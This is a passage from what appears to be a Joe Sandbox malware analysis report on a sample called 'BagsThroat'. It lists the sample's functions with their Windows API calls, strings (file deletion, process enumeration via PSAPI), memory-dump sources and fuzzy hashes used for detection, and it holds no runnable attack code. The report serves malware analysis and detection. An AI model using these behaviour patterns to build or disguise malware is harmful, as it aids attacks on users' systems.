                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                        Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                        Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                        Non-executed Functions

                                        Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $ @$M$N
                                        • API String ID: 1638840714-3479655940
                                        • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                        • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                        Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                        Strings
                                        • \*.*, xrefs: 00406D2F
                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                        • ptF, xrefs: 00406D1A
                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                        • API String ID: 2035342205-1650287579
                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                        Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                        • String ID: F$A
                                        • API String ID: 3347642858-1281894373
                                        • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                        • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                        Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                        • API String ID: 1916479912-1189179171
                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                        Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                        Strings
                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                        • API String ID: 542301482-1377821865
                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                        Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                        Function 0040737E Relevance: .3, Instructions: 303COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                        Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
